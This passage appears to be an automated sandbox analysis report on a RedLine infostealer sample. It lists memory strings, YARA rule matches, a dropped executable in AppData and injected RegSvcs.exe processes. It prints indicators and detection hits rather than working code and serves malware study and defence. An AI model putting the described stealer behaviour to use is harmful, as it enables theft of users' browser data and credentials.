                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460091932.000000000303C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, VWGccZGgix.exe, 00000009.00000002.1500999743.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1603595043.0000000003140000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000003089000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                    Source: RegSvcs.exe, 0000000D.00000002.1631278597.0000000002DF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
                    Source: RegSvcs.exe, 00000007.00000002.1603595043.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1631278597.0000000002D89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: RegSvcs.exe, 00000007.00000002.1611586894.000000000411A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1611586894.000000000429E000.00000004.00000800.00020000.00000000.sdmp, tmpB768.tmp.7.dr, tmpB778.tmp.7.dr, tmpDC96.tmp.13.dr, tmpEEB6.tmp.7.dr, tmpB737.tmp.7.dr, tmp4A0C.tmp.13.dr, tmp4A1C.tmp.13.dr, tmp2608.tmp.7.dr, tmp1367.tmp.13.dr, tmp8063.tmp.13.dr, tmpEEE7.tmp.7.dr, tmpEEF7.tmp.7.dr, tmp4A6D.tmp.13.dr, tmp1357.tmp.13.dr, tmp4A5D.tmp.13.dr, tmp4A3C.tmp.13.dr, tmp25E8.tmp.7.dr, tmpB747.tmp.7.dr, tmp25D7.tmp.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                    Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_02DFDE240_2_02DFDE24
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_07A157A80_2_07A157A8
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_07A14F380_2_07A14F38
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_07A174480_2_07A17448
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_07A153700_2_07A15370
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_07A16A480_2_07A16A48
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_07A10A4A0_2_07A10A4A
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeCode function: 0_2_07A1D8580_2_07A1D858
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0179E7B07_2_0179E7B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0179DC907_2_0179DC90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_071AE1B87_2_071AE1B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_071AB9307_2_071AB930
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_071AE9D87_2_071AE9D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_071AE9C97_2_071AE9C9
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_0086DE249_2_0086DE24
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA7D809_2_04BA7D80
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA0D2C9_2_04BA0D2C
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA6EB89_2_04BA6EB8
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA57F09_2_04BA57F0
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA57E09_2_04BA57E0
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA0D289_2_04BA0D28
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_04BA29D09_2_04BA29D0
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F2C7309_2_06F2C730
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F257A89_2_06F257A8
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F24F389_2_06F24F38
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F274489_2_06F27448
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F26A489_2_06F26A48
                    Source: C:\Users\user\AppData\Roaming\VWGccZGgix.exeCode function: 9_2_06F253709_2_06F25370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_02C2E7B013_2_02C2E7B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_02C2DC9013_2_02C2DC90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DFC73013_2_06DFC730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DF968013_2_06DF9680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DF7D7013_2_06DF7D70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DF4A4013_2_06DF4A40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DFB3C813_2_06DFB3C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_06DF387813_2_06DF3878
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1458811526.000000000115E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000000.1433024584.0000000000D02000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIlkY.exeJ vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1464913728.00000000079A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exe, 00000000.00000002.1460091932.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exeBinary or memory string: OriginalFilenameIlkY.exeJ vs 13P2mxLaQk.exe
                    Source: 13P2mxLaQk.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.409bfd0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.13P2mxLaQk.exe.40841b0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: 13P2mxLaQk.exe PID: 5880, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 4468, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 13P2mxLaQk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: VWGccZGgix.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.13P2mxLaQk.exe.4199ad8.3.raw.unpack, nolkxinFKGZ2pvmyP3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, nolkxinFKGZ2pvmyP3.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.13P2mxLaQk.exe.79a0000.6.raw.unpack, RDYWAmJyZP6MtCkv27.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@18/100@2/1
                    Source: C:\Users\user\Desktop\13P2mxLaQk.exeFile created: C:\Users\user\AppData\Roaming\VWGccZGgix.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
